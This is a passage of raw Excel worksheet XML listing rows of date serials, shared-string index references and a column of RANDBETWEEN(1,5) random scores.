        <f t="shared" ca="1" si="269"/>
        <v>3</v>
      </c>
    </row>
    <row r="17249" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17249" s="1">
        <v>43185.563564814816</v>
      </c>
      <c r="C17249" t="s">
        <v>10</v>
      </c>
      <c r="D17249" t="s">
        <v>6</v>
      </c>
      <c r="E17249" t="s">
        <v>15529</v>
      </c>
      <c r="F17249">
        <f t="shared" ca="1" si="269"/>
        <v>5</v>
      </c>
    </row>
    <row r="17250" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17250" s="1">
        <v>43185.552905092591</v>
      </c>
      <c r="C17250" t="s">
        <v>10</v>
      </c>
      <c r="D17250" t="s">
        <v>46</v>
      </c>
      <c r="E17250" t="s">
        <v>15530</v>
      </c>
      <c r="F17250">
        <f t="shared" ca="1" si="269"/>
        <v>4</v>
      </c>
    </row>
    <row r="17251" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A17251" s="1">
        <v>43185.552256944444</v>
      </c>
      <c r="C17251" t="s">
        <v>50</v>
      </c>
      <c r="E17251" s="2" t="s">
        <v>15531</v>
      </c>
      <c r="F17251">
        <f t="shared" ca="1" si="269"/>
        <v>5</v>
      </c>
    </row>
    <row r="17252" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17252" s="1">
        <v>43185.535312499997</v>
      </c>
      <c r="C17252" t="s">
        <v>41</v>
      </c>
      <c r="E17252" t="s">
        <v>15532</v>
      </c>
      <c r="F17252">
        <f t="shared" ca="1" si="269"/>
        <v>3</v>
      </c>
    </row>
    <row r="17253" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A17253" s="1">
        <v>43185.535081018519</v>
      </c>
      <c r="C17253" t="s">
        <v>8588</v>
      </c>
      <c r="D17253" t="s">
        <v>263</v>
      </c>
      <c r="E17253" s="2" t="s">
        <v>15533</v>
      </c>
      <c r="F17253">
        <f t="shared" ca="1" si="269"/>
        <v>5</v>
      </c>
    </row>
    <row r="17254" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17254" s="1">
        <v>43185.528090277781</v>
      </c>
      <c r="C17254" t="s">
        <v>6</v>
      </c>
      <c r="D17254" t="s">
        <v>25</v>
      </c>
      <c r="E17254" t="s">
        <v>15534</v>
      </c>
      <c r="F17254">
        <f t="shared" ca="1" si="269"/>
        <v>4</v>
      </c>
    </row>
    <row r="17255" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17255" s="1">
        <v>43185.518020833333</v>
      </c>
      <c r="C17255" t="s">
        <v>6</v>
      </c>
      <c r="D17255" t="s">
        <v>821</v>
      </c>
      <c r="E17255" t="s">
        <v>15535</v>
      </c>
      <c r="F17255">
        <f t="shared" ca="1" si="269"/>
        <v>1</v>
      </c>
    </row>
    <row r="17256" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17256" s="1">
        <v>43185.511550925927</v>
      </c>
      <c r="C17256" t="s">
        <v>10</v>
      </c>
      <c r="D17256" t="s">
        <v>36</v>
      </c>
      <c r="E17256" t="s">
        <v>15536</v>
      </c>
      <c r="F17256">
        <f t="shared" ca="1" si="269"/>
        <v>3</v>
      </c>
    </row>
    <row r="17257" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17257" s="1">
        <v>43185.505810185183</v>
      </c>
      <c r="C17257" t="s">
        <v>10</v>
      </c>
      <c r="D17257" t="s">
        <v>381</v>
      </c>
      <c r="E17257" t="s">
        <v>15537</v>
      </c>
      <c r="F17257">
        <f t="shared" ca="1" si="269"/>
        <v>3</v>
      </c>
    </row>
    <row r="17258" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17258" s="1">
        <v>43185.487187500003</v>
      </c>
      <c r="C17258" t="s">
        <v>301</v>
      </c>
      <c r="E17258" t="s">
        <v>15538</v>
      </c>
      <c r="F17258">
        <f t="shared" ca="1" si="269"/>
        <v>2</v>
      </c>
    </row>
    <row r="17259" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17259" s="1">
        <v>43185.486342592594</v>
      </c>
      <c r="C17259" t="s">
        <v>301</v>
      </c>
      <c r="E17259" t="s">
        <v>15539</v>
      </c>
      <c r="F17259">
        <f t="shared" ca="1" si="269"/>
        <v>4</v>
      </c>
    </row>
    <row r="17260" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17260" s="1">
        <v>43185.485208333332</v>
      </c>
      <c r="C17260" t="s">
        <v>301</v>
      </c>
      <c r="E17260" t="s">
        <v>15540</v>
      </c>
      <c r="F17260">
        <f t="shared" ca="1" si="269"/>
        <v>3</v>
      </c>
    </row>
    <row r="17261" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A17261" s="1">
        <v>43185.472442129627</v>
      </c>
      <c r="C17261" t="s">
        <v>1408</v>
      </c>
      <c r="D17261" t="s">
        <v>336</v>
      </c>
      <c r="E17261" s="2" t="s">
        <v>15541</v>
      </c>
      <c r="F17261">
        <f t="shared" ca="1" si="269"/>
        <v>2</v>
      </c>
    </row>
    <row r="17262" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A17262" s="1">
        <v>43185.471064814818</v>
      </c>
      <c r="C17262" t="s">
        <v>158</v>
      </c>
      <c r="D17262" t="s">
        <v>2139</v>
      </c>
      <c r="E17262" s="2" t="s">
        <v>15542</v>
      </c>
      <c r="F17262">
        <f t="shared" ca="1" si="269"/>
        <v>3</v>
      </c>
    </row>
    <row r="17263" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17263" s="1">
        <v>43185.463703703703</v>
      </c>
      <c r="C17263" t="s">
        <v>71</v>
      </c>
      <c r="E17263" t="s">
        <v>15543</v>
      </c>
      <c r="F17263">
        <f t="shared" ca="1" si="269"/>
        <v>2</v>
      </c>
    </row>
    <row r="17264" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A17264" s="1">
        <v>43185.462731481479</v>
      </c>
      <c r="C17264" t="s">
        <v>586</v>
      </c>
      <c r="E17264" s="2" t="s">
        <v>15544</v>
      </c>
      <c r="F17264">
        <f t="shared" ca="1" si="269"/>
        <v>5</v>
      </c>
    </row>
    <row r="17265" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A17265" s="1">
        <v>43185.461342592593</v>
      </c>
      <c r="C17265" t="s">
        <v>173</v>
      </c>
      <c r="E17265" s="2" t="s">
        <v>15545</v>
      </c>
      <c r="F17265">
        <f t="shared" ca="1" si="269"/>
        <v>3</v>
      </c>
    </row>
    <row r="17266" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17266" s="1">
        <v>43185.458275462966</v>
      </c>
      <c r="C17266" t="s">
        <v>124</v>
      </c>
      <c r="D17266" t="s">
        <v>312</v>
      </c>
      <c r="E17266" t="s">
        <v>15546</v>
      </c>
      <c r="F17266">
        <f t="shared" ca="1" si="269"/>
        <v>5</v>
      </c>
    </row>
    <row r="17267" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17267" s="1">
        <v>43185.452199074076</v>
      </c>
      <c r="C17267" t="s">
        <v>301</v>
      </c>
      <c r="E17267" t="s">
        <v>15547</v>
      </c>
      <c r="F17267">
        <f t="shared" ca="1" si="269"/>
        <v>1</v>
      </c>
    </row>
    <row r="17268" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A17268" s="1">
        <v>43185.444826388892</v>
      </c>
      <c r="C17268" t="s">
        <v>127</v>
      </c>
      <c r="D17268" t="s">
        <v>374</v>
      </c>
      <c r="E17268" s="2" t="s">
        <v>15548</v>
      </c>
      <c r="F17268">
        <f t="shared" ca="1" si="269"/>
        <v>3</v>
      </c>
    </row>
    <row r="17269" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17269" s="1">
        <v>43185.411944444444</v>
      </c>
      <c r="C17269" t="s">
        <v>10</v>
      </c>
      <c r="D17269" t="s">
        <v>89</v>
      </c>
      <c r="E17269" t="s">
        <v>15549</v>
      </c>
      <c r="F17269">
        <f t="shared" ca="1" si="269"/>
        <v>2</v>
      </c>
    </row>
    <row r="17270" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A17270" s="1">
        <v>43185.398622685185</v>
      </c>
      <c r="C17270" t="s">
        <v>124</v>
      </c>
      <c r="D17270" t="s">
        <v>312</v>
      </c>
      <c r="E17270" s="2" t="s">
        <v>15550</v>
      </c>
      <c r="F17270">
        <f t="shared" ca="1" si="269"/>
        <v>4</v>
      </c>
    </row>
    <row r="17271" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17271" s="1">
        <v>43185.387974537036</v>
      </c>
      <c r="C17271" t="s">
        <v>48</v>
      </c>
      <c r="E17271" t="s">
        <v>15551</v>
      </c>
      <c r="F17271">
        <f t="shared" ca="1" si="269"/>
        <v>4</v>
      </c>
    </row>
    <row r="17272" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17272" s="1">
        <v>43185.375034722223</v>
      </c>
      <c r="C17272" t="s">
        <v>124</v>
      </c>
      <c r="E17272" t="s">
        <v>15552</v>
      </c>
      <c r="F17272">
        <f t="shared" ca="1" si="269"/>
        <v>2</v>
      </c>
    </row>
    <row r="17273" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17273" s="1">
        <v>43185.340069444443</v>
      </c>
      <c r="C17273" t="s">
        <v>48</v>
      </c>
      <c r="E17273" t="s">
        <v>15553</v>
      </c>
      <c r="F17273">
        <f t="shared" ca="1" si="269"/>
        <v>3</v>
      </c>
    </row>
    <row r="17274" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A17274" s="1">
        <v>43185.336412037039</v>
      </c>
      <c r="C17274" t="s">
        <v>48</v>
      </c>
      <c r="E17274" s="2" t="s">
        <v>15554</v>
      </c>
      <c r="F17274">
        <f t="shared" ca="1" si="269"/>
        <v>5</v>
      </c>
    </row>
    <row r="17275" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17275" s="1">
        <v>43185.332268518519</v>
      </c>
      <c r="C17275" t="s">
        <v>48</v>
      </c>
      <c r="E17275" t="s">
        <v>15555</v>
      </c>
      <c r="F17275">
        <f t="shared" ca="1" si="269"/>
        <v>4</v>
      </c>
    </row>
    <row r="17276" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A17276" s="1">
        <v>43185.32199074074</v>
      </c>
      <c r="C17276" t="s">
        <v>10</v>
      </c>
      <c r="D17276" t="s">
        <v>80</v>
      </c>
      <c r="E17276" s="2" t="s">
        <v>15556</v>
      </c>
      <c r="F17276">
        <f t="shared" ca="1" si="269"/>
        <v>1</v>
      </c>
    </row>
    <row r="17277" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A17277" s="1">
        <v>43185.294872685183</v>
      </c>
      <c r="C17277" t="s">
        <v>10</v>
      </c>
      <c r="D17277" t="s">
        <v>71</v>
      </c>
      <c r="E17277" s="2" t="s">
        <v>15557</v>
      </c>
      <c r="F17277">
        <f t="shared" ca="1" si="269"/>
        <v>1</v>
      </c>
    </row>
    <row r="17278" spans="1:6" ht="360" x14ac:dyDescent="0.25">
      <c r="A17278" s="1">
        <v>43185.289467592593</v>
      </c>
      <c r="C17278" t="s">
        <v>50</v>
      </c>
      <c r="E17278" s="2" t="s">
        <v>15558</v>
      </c>
      <c r="F17278">
        <f t="shared" ca="1" si="269"/>
        <v>4</v>
      </c>
    </row>
    <row r="17279" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A17279" s="1">
        <v>43185.278043981481</v>
      </c>
      <c r="C17279" t="s">
        <v>127</v>
      </c>
      <c r="D17279" t="s">
        <v>158</v>
      </c>
      <c r="E17279" s="2" t="s">
        <v>15559</v>
      </c>
      <c r="F17279">
        <f t="shared" ca="1" si="269"/>
        <v>5</v>
      </c>
    </row>
    <row r="17280" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A17280" s="1">
        <v>43185.247893518521</v>
      </c>
      <c r="C17280" t="s">
        <v>292</v>
      </c>
      <c r="D17280" t="s">
        <v>7</v>
      </c>
      <c r="E17280" s="2" t="s">
        <v>15560</v>
      </c>
      <c r="F17280">
        <f t="shared" ca="1" si="269"/>
        <v>5</v>
      </c>
    </row>
    <row r="17281" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A17281" s="1">
        <v>43185.225474537037</v>
      </c>
      <c r="C17281" t="s">
        <v>43</v>
      </c>
      <c r="E17281" s="2" t="s">
        <v>15561</v>
      </c>
      <c r="F17281">
        <f t="shared" ca="1" si="269"/>
        <v>3</v>
      </c>
    </row>
    <row r="17282" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17282" s="1">
        <v>43185.195289351854</v>
      </c>
      <c r="C17282" t="s">
        <v>48</v>
      </c>
      <c r="E17282" t="s">
        <v>15562</v>
      </c>
      <c r="F17282">
        <f t="shared" ref="F17282:F17345" ca="1" si="270">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="17283" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A17283" s="1">
        <v>43185.160462962966</v>
      </c>
      <c r="C17283" t="s">
        <v>292</v>
      </c>
      <c r="D17283" t="s">
        <v>23</v>
      </c>
      <c r="E17283" s="2" t="s">
        <v>15563</v>
      </c>
      <c r="F17283">
        <f t="shared" ca="1" si="270"/>
        <v>1</v>
      </c>
    </row>
    <row r="17284" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17284" s="1">
        <v>43185.14947916667</v>
      </c>
      <c r="C17284" t="s">
        <v>430</v>
      </c>
      <c r="E17284" t="s">
        <v>15564</v>
      </c>
      <c r="F17284">
        <f t="shared" ca="1" si="270"/>
        <v>3</v>
      </c>
    </row>
    <row r="17285" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A17285" s="1">
        <v>43185.141886574071</v>
      </c>
      <c r="C17285" t="s">
        <v>471</v>
      </c>
      <c r="E17285" s="2" t="s">
        <v>15565</v>
      </c>
      <c r="F17285">
        <f t="shared" ca="1" si="270"/>
        <v>2</v>
      </c>
    </row>
    <row r="17286" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17286" s="1">
        <v>43185.141539351855</v>
      </c>
      <c r="C17286" t="s">
        <v>2545</v>
      </c>
      <c r="D17286" t="s">
        <v>271</v>
      </c>
      <c r="F17286">
        <f t="shared" ca="1" si="270"/>
        <v>3</v>
      </c>
    </row>
    <row r="17287" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17287" s="1">
        <v>43185.130023148151</v>
      </c>
      <c r="C17287" t="s">
        <v>173</v>
      </c>
      <c r="E17287" t="s">
        <v>15566</v>
      </c>
      <c r="F17287">
        <f t="shared" ca="1" si="270"/>
        <v>4</v>
      </c>
    </row>
    <row r="17288" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17288" s="1">
        <v>43185.031863425924</v>
      </c>
      <c r="C17288" t="s">
        <v>41</v>
      </c>
      <c r="E17288" t="s">
        <v>11634</v>
      </c>
      <c r="F17288">
        <f t="shared" ca="1" si="270"/>
        <v>4</v>
      </c>
    </row>
    <row r="17289" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A17289" s="1">
        <v>43184.768576388888</v>
      </c>
      <c r="C17289" t="s">
        <v>6</v>
      </c>
      <c r="D17289" t="s">
        <v>194</v>
      </c>
      <c r="E17289" s="2" t="s">
        <v>15567</v>
      </c>
      <c r="F17289">
        <f t="shared" ca="1" si="270"/>
        <v>3</v>
      </c>
    </row>
    <row r="17290" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17290" s="1">
        <v>43184.595023148147</v>
      </c>
      <c r="C17290" t="s">
        <v>16</v>
      </c>
      <c r="E17290" t="s">
        <v>15568</v>
      </c>
      <c r="F17290">
        <f t="shared" ca="1" si="270"/>
        <v>1</v>
      </c>
    </row>
    <row r="17291" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17291" s="1">
        <v>43184.571342592593</v>
      </c>
      <c r="C17291" t="s">
        <v>71</v>
      </c>
      <c r="E17291" t="s">
        <v>15569</v>
      </c>
      <c r="F17291">
        <f t="shared" ca="1" si="270"/>
        <v>4</v>
      </c>
    </row>
    <row r="17292" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A17292" s="1">
        <v>43184.526493055557</v>
      </c>
      <c r="C17292" t="s">
        <v>253</v>
      </c>
      <c r="D17292" t="s">
        <v>330</v>
      </c>
      <c r="E17292" s="2" t="s">
        <v>15570</v>
      </c>
      <c r="F17292">
        <f t="shared" ca="1" si="270"/>
        <v>4</v>
      </c>
    </row>
    <row r="17293" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A17293" s="1">
        <v>43184.514398148145</v>
      </c>
      <c r="C17293" t="s">
        <v>67</v>
      </c>
      <c r="E17293" s="2" t="s">
        <v>15571</v>
      </c>
      <c r="F17293">
        <f t="shared" ca="1" si="270"/>
        <v>1</v>
      </c>
    </row>
    <row r="17294" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17294" s="1">
        <v>43184.478726851848</v>
      </c>
      <c r="C17294" t="s">
        <v>10</v>
      </c>
      <c r="D17294" t="s">
        <v>39</v>
      </c>
      <c r="E17294" t="s">
        <v>15572</v>
      </c>
      <c r="F17294">
        <f t="shared" ca="1" si="270"/>
        <v>1</v>
      </c>
    </row>
    <row r="17295" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17295" s="1">
        <v>43184.43990740741</v>
      </c>
      <c r="C17295" t="s">
        <v>10</v>
      </c>
      <c r="D17295" t="s">
        <v>36</v>
      </c>
      <c r="E17295" t="s">
        <v>15573</v>
      </c>
      <c r="F17295">
        <f t="shared" ca="1" si="270"/>
        <v>5</v>
      </c>
    </row>
    <row r="17296" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A17296" s="1">
        <v>43184.430196759262</v>
      </c>
      <c r="C17296" t="s">
        <v>1408</v>
      </c>
      <c r="E17296" s="2" t="s">
        <v>15574</v>
      </c>
      <c r="F17296">
        <f t="shared" ca="1" si="270"/>
        <v>1</v>
      </c>
    </row>
    <row r="17297" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A17297" s="1">
        <v>43184.383101851854</v>
      </c>
      <c r="C17297" t="s">
        <v>4500</v>
      </c>
      <c r="D17297" t="s">
        <v>71</v>
      </c>
      <c r="E17297" s="2" t="s">
        <v>15575</v>
      </c>
      <c r="F17297">
        <f t="shared" ca="1" si="270"/>
        <v>2</v>
      </c>
    </row>
    <row r="17298" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A17298" s="1">
        <v>43184.376261574071</v>
      </c>
      <c r="C17298" t="s">
        <v>7058</v>
      </c>
      <c r="D17298" t="s">
        <v>2139</v>
      </c>
      <c r="E17298" s="2" t="s">
        <v>15576</v>
      </c>
      <c r="F17298">
        <f t="shared" ca="1" si="270"/>
        <v>3</v>
      </c>
    </row>
    <row r="17299" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A17299" s="1">
        <v>43184.352210648147</v>
      </c>
      <c r="C17299" t="s">
        <v>63</v>
      </c>
      <c r="E17299" s="2" t="s">
        <v>15577</v>
      </c>
      <c r="F17299">
        <f t="shared" ca="1" si="270"/>
        <v>4</v>
      </c>
    </row>
    <row r="17300" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A17300" s="1">
        <v>43184.309259259258</v>
      </c>
      <c r="C17300" t="s">
        <v>4500</v>
      </c>
      <c r="D17300" t="s">
        <v>7</v>
      </c>
      <c r="E17300" s="2" t="s">
        <v>15578</v>
      </c>
      <c r="F17300">
        <f t="shared" ca="1" si="270"/>
        <v>5</v>
      </c>
    </row>
    <row r="17301" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A17301" s="1">
        <v>43184.303842592592</v>
      </c>
      <c r="C17301" t="s">
        <v>7058</v>
      </c>
      <c r="D17301" t="s">
        <v>750</v>
      </c>
      <c r="E17301" s="2" t="s">
        <v>15579</v>
      </c>
      <c r="F17301">
        <f t="shared" ca="1" si="270"/>
        <v>4</v>
      </c>
    </row>
    <row r="17302" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A17302" s="1">
        <v>43184.269594907404</v>
      </c>
      <c r="C17302" t="s">
        <v>4500</v>
      </c>
      <c r="D17302" t="s">
        <v>163</v>
      </c>
      <c r="E17302" s="2" t="s">
        <v>15580</v>
      </c>
      <c r="F17302">
        <f t="shared" ca="1" si="270"/>
        <v>2</v>
      </c>
    </row>
    <row r="17303" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A17303" s="1">
        <v>43184.263969907406</v>
      </c>
      <c r="C17303" t="s">
        <v>7058</v>
      </c>
      <c r="D17303" t="s">
        <v>56</v>
      </c>
      <c r="E17303" s="2" t="s">
        <v>15581</v>
      </c>
      <c r="F17303">
        <f t="shared" ca="1" si="270"/>
        <v>2</v>
      </c>
    </row>
    <row r="17304" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A17304" s="1">
        <v>43184.193645833337</v>
      </c>
      <c r="C17304" t="s">
        <v>4500</v>
      </c>
      <c r="D17304" t="s">
        <v>158</v>
      </c>
      <c r="E17304" s="2" t="s">
        <v>15582</v>
      </c>
      <c r="F17304">
        <f t="shared" ca="1" si="270"/>
        <v>3</v>
      </c>
    </row>
    <row r="17305" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A17305" s="1">
        <v>43184.189305555556</v>
      </c>
      <c r="C17305" t="s">
        <v>7058</v>
      </c>
      <c r="D17305" t="s">
        <v>56</v>
      </c>
      <c r="E17305" s="2" t="s">
        <v>15583</v>
      </c>
      <c r="F17305">
        <f t="shared" ca="1" si="270"/>
        <v>3</v>
      </c>
    </row>
    <row r="17306" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A17306" s="1">
        <v>43184.178171296298</v>
      </c>
      <c r="C17306" t="s">
        <v>4500</v>
      </c>
      <c r="D17306" t="s">
        <v>151</v>
      </c>
      <c r="E17306" s="2" t="s">
        <v>15584</v>
      </c>
      <c r="F17306">
        <f t="shared" ca="1" si="270"/>
        <v>4</v>
      </c>
    </row>
    <row r="17307" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A17307" s="1">
        <v>43184.173877314817</v>
      </c>
      <c r="C17307" t="s">
        <v>7058</v>
      </c>
      <c r="D17307" t="s">
        <v>7</v>
      </c>
      <c r="E17307" s="2" t="s">
        <v>15585</v>
      </c>
      <c r="F17307">
        <f t="shared" ca="1" si="270"/>
        <v>2</v>
      </c>
    </row>
    <row r="17308" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A17308" s="1">
        <v>43184.13417824074</v>
      </c>
      <c r="C17308" t="s">
        <v>4500</v>
      </c>
      <c r="D17308" t="s">
        <v>151</v>
      </c>
      <c r="E17308" s="2" t="s">
        <v>15586</v>
      </c>
      <c r="F17308">
        <f t="shared" ca="1" si="270"/>
        <v>3</v>
      </c>
    </row>
    <row r="17309" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A17309" s="1">
        <v>43184.129641203705</v>
      </c>
      <c r="C17309" t="s">
        <v>7058</v>
      </c>
      <c r="D17309" t="s">
        <v>163</v>
      </c>
      <c r="E17309" s="2" t="s">
        <v>15587</v>
      </c>
      <c r="F17309">
        <f t="shared" ca="1" si="270"/>
        <v>3</v>
      </c>
    </row>
    <row r="17310" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A17310" s="1">
        <v>43184.125694444447</v>
      </c>
      <c r="C17310" t="s">
        <v>4970</v>
      </c>
      <c r="D17310" t="s">
        <v>602</v>
      </c>
      <c r="E17310" s="2" t="s">
        <v>15588</v>
      </c>
      <c r="F17310">
        <f t="shared" ca="1" si="270"/>
        <v>4</v>
      </c>
    </row>
    <row r="17311" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17311" s="1">
        <v>43184.098090277781</v>
      </c>
      <c r="C17311" t="s">
        <v>10</v>
      </c>
      <c r="D17311" t="s">
        <v>178</v>
      </c>
      <c r="E17311" t="s">
        <v>15589</v>
      </c>
      <c r="F17311">
        <f t="shared" ca="1" si="270"/>
        <v>3</v>
      </c>
    </row>
    <row r="17312" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A17312" s="1">
        <v>43183.928032407406</v>
      </c>
      <c r="C17312" t="s">
        <v>729</v>
      </c>
      <c r="D17312" t="s">
        <v>1160</v>
      </c>
      <c r="E17312" s="2" t="s">
        <v>15590</v>
      </c>
      <c r="F17312">
        <f t="shared" ca="1" si="270"/>
        <v>3</v>
      </c>
    </row>
    <row r="17313" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17313" s="1">
        <v>43183.794502314813</v>
      </c>
      <c r="C17313" t="s">
        <v>10</v>
      </c>
      <c r="D17313" t="s">
        <v>1056</v>
      </c>
      <c r="E17313" t="s">
        <v>15591</v>
      </c>
      <c r="F17313">
        <f t="shared" ca="1" si="270"/>
        <v>1</v>
      </c>
    </row>
    <row r="17314" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A17314" s="1">
        <v>43183.642557870371</v>
      </c>
      <c r="C17314" t="s">
        <v>3515</v>
      </c>
      <c r="D17314" t="s">
        <v>86</v>
      </c>
      <c r="E17314" s="2" t="s">
        <v>15592</v>
      </c>
      <c r="F17314">
        <f t="shared" ca="1" si="270"/>
        <v>3</v>
      </c>
    </row>
    <row r="17315" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A17315" s="1">
        <v>43183.637187499997</v>
      </c>
      <c r="C17315" t="s">
        <v>4500</v>
      </c>
      <c r="D17315" t="s">
        <v>86</v>
      </c>
      <c r="E17315" s="2" t="s">
        <v>15593</v>
      </c>
      <c r="F17315">
        <f t="shared" ca="1" si="270"/>
        <v>4</v>
      </c>
    </row>
    <row r="17316" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17316" s="1">
        <v>43183.63685185185</v>
      </c>
      <c r="C17316" t="s">
        <v>1050</v>
      </c>
      <c r="F17316">
        <f t="shared" ca="1" si="270"/>
        <v>1</v>
      </c>
    </row>
    <row r="17317" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A17317" s="1">
        <v>43183.596145833333</v>
      </c>
      <c r="C17317" t="s">
        <v>15594</v>
      </c>
      <c r="D17317" t="s">
        <v>381</v>
      </c>
      <c r="E17317" s="2" t="s">
        <v>15595</v>
      </c>
      <c r="F17317">
        <f t="shared" ca="1" si="270"/>
        <v>2</v>
      </c>
    </row>
    <row r="17318" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A17318" s="1">
        <v>43183.517106481479</v>
      </c>
      <c r="C17318" t="s">
        <v>1194</v>
      </c>
      <c r="D17318" t="s">
        <v>271</v>
      </c>
      <c r="E17318" s="2" t="s">
        <v>15596</v>
      </c>
      <c r="F17318">
        <f t="shared" ca="1" si="270"/>
        <v>5</v>
      </c>
    </row>
    <row r="17319" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A17319" s="1">
        <v>43183.500868055555</v>
      </c>
      <c r="C17319" t="s">
        <v>2144</v>
      </c>
      <c r="D17319" t="s">
        <v>124</v>
      </c>
      <c r="E17319" s="2" t="s">
        <v>15597</v>
      </c>
      <c r="F17319">
        <f t="shared" ca="1" si="270"/>
        <v>4</v>
      </c>
    </row>
    <row r="17320" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A17320" s="1">
        <v>43183.456342592595</v>
      </c>
      <c r="C17320" t="s">
        <v>17</v>
      </c>
      <c r="D17320" t="s">
        <v>330</v>
      </c>
      <c r="E17320" s="2" t="s">
        <v>15563</v>
      </c>
      <c r="F17320">
        <f t="shared" ca="1" si="270"/>
        <v>3</v>
      </c>
    </row>
    <row r="17321" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A17321" s="1">
        <v>43183.426747685182</v>
      </c>
      <c r="C17321" t="s">
        <v>139</v>
      </c>
      <c r="D17321" t="s">
        <v>80</v>
      </c>
      <c r="E17321" s="2" t="s">
        <v>15598</v>
      </c>
      <c r="F17321">
        <f t="shared" ca="1" si="270"/>
        <v>1</v>
      </c>
    </row>
    <row r="17322" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17322" s="1">
        <v>43183.408773148149</v>
      </c>
      <c r="C17322" t="s">
        <v>173</v>
      </c>
      <c r="E17322" t="s">
        <v>15599</v>
      </c>
      <c r="F17322">
        <f t="shared" ca="1" si="270"/>
        <v>5</v>
      </c>
    </row>
    <row r="17323" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A17323" s="1">
        <v>43183.369895833333</v>
      </c>
      <c r="C17323" t="s">
        <v>71</v>
      </c>
      <c r="E17323" s="2" t="s">
        <v>15600</v>
      </c>
      <c r="F17323">
        <f t="shared" ca="1" si="270"/>
        <v>5</v>
      </c>
    </row>
    <row r="17324" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17324" s="1">
        <v>43183.326307870368</v>
      </c>
      <c r="C17324" t="s">
        <v>836</v>
      </c>
      <c r="D17324" t="s">
        <v>330</v>
      </c>
      <c r="E17324" t="s">
        <v>15601</v>
      </c>
      <c r="F17324">
        <f t="shared" ca="1" si="270"/>
        <v>3</v>
      </c>
    </row>
    <row r="17325" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17325" s="1">
        <v>43183.294085648151</v>
      </c>
      <c r="C17325" t="s">
        <v>10</v>
      </c>
      <c r="D17325" t="s">
        <v>271</v>
      </c>
      <c r="E17325" t="s">
        <v>15602</v>
      </c>
      <c r="F17325">
        <f t="shared" ca="1" si="270"/>
        <v>1</v>
      </c>
    </row>
    <row r="17326" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17326" s="1">
